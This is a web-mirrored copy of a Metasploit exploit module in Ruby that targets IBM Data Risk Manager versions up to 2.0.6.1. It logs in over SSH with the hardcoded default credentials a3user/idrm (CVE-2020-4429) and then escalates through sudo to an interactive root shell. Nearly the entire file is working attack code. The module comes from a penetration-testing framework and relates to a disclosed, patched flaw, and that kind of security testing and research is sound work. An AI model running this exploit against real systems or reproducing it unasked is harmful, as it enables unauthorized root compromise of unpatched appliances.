CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/ssh/ibm_drm_a3user.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::SSH

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'IBM Data Risk Manager a3user Default Password',

16
        'Description' => %q{

17
          This module abuses a known default password in IBM Data Risk Manager. The 'a3user'

18
          has the default password 'idrm' and allows an attacker to log in to the virtual appliance

19
          via SSH. This can be escalate to full root access, as 'a3user' has sudo access with the default password.

20
          At the time of disclosure this was an 0day, but it was later confirmed and patched by IBM.

21
          Versions <= 2.0.6.1 are confirmed to be vulnerable.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module

26
        ],

27
        'References' => [

28
          [ 'CVE', '2020-4429' ], # insecure default password

29
          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],

30
          [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],

31
          [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/']

32
        ],

33
        'Payload' => {

34
          'Compat' => {

35
            'PayloadType' => 'cmd_interact',

36
            'ConnectionType' => 'find'

37
          }

38
        },

39
        'Platform' => 'unix',

40
        'Arch' => ARCH_CMD,

41
        'Targets' => [

42
          [ 'IBM Data Risk Manager <= 2.0.6.1', {} ]

43
        ],

44
        'Privileged' => true,

45
        'DefaultTarget' => 0,

46
        'DisclosureDate' => '2020-04-21',

47
        'Notes' => {

48
          'Stability' => [CRASH_SAFE],

49
          'Reliability' => [REPEATABLE_SESSION],

50
          'SideEffects' => []

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        Opt::RPORT(22),

58
        OptString.new('USERNAME', [true, 'Username to login with', 'a3user']),

59
        OptString.new('PASSWORD', [true, 'Password to login with', 'idrm'])

60
      ]

61
    )

62


63
    register_advanced_options(

64
      [

65
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),

66
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])

67
      ]

68
    )

69
  end

70


71
  def on_new_session(client)

72
    print_status("#{peer} - Escalating privileges to root, please wait a few seconds...")

73
    # easiest way I found to get passwordless root, not sure if there's a shorter command

74
    client.shell_command_token("echo #{datastore['PASSWORD']} | sudo -S 'echo 2>/dev/null'; sudo /bin/sh")

75
    print_good("#{peer} - Done, enjoy your root shell!")

76
  end

77


78
  def rhost

79
    datastore['RHOST']

80
  end

81


82
  def rport

83
    datastore['RPORT']

84
  end

85


86
  def peer

87
    "#{rhost}:#{rport}"

88
  end

89


90
  def do_login(user, pass)

91
    opts = ssh_client_defaults.merge({

92
      auth_methods: ['password', 'keyboard-interactive'],

93
      port: rport,

94
      password: pass

95
    })

96


97
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

98


99
    begin

100
      ssh =

101
        ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

102
          Net::SSH.start(rhost, user, opts)

103
        end

104
    rescue Rex::ConnectionError

105
      fail_with(Failure::Unknown, "#{peer} SSH - Connection error")

106
    rescue Net::SSH::Disconnect, ::EOFError

107
      fail_with(Failure::Unknown, "#{peer} SSH - Disconnected during negotiation")

108
    rescue ::Timeout::Error

109
      fail_with(Failure::Unknown, "#{peer} SSH - Timed out during negotiation")

110
    rescue Net::SSH::AuthenticationFailed

111
      fail_with(Failure::Unknown, "#{peer} SSH - Failed authentication")

112
    rescue Net::SSH::Exception => e

113
      fail_with(Failure::Unknown, "#{peer} SSH Error: #{e.class} : #{e.message}")

114
    end

115


116
    return Net::SSH::CommandStream.new(ssh) if ssh

117


118
    nil

119
  end

120


121
  def exploit

122
    user = datastore['USERNAME']

123
    pass = datastore['PASSWORD']

124


125
    print_status("#{peer} - Attempting to log in to the IBM Data Risk Manager appliance...")

126
    conn = do_login(user, pass)

127
    if conn

128
      print_good("#{peer} - Login successful (#{user}:#{pass})")

129
      handler(conn.lsock)

130
    end

131
  end

132
end

133


134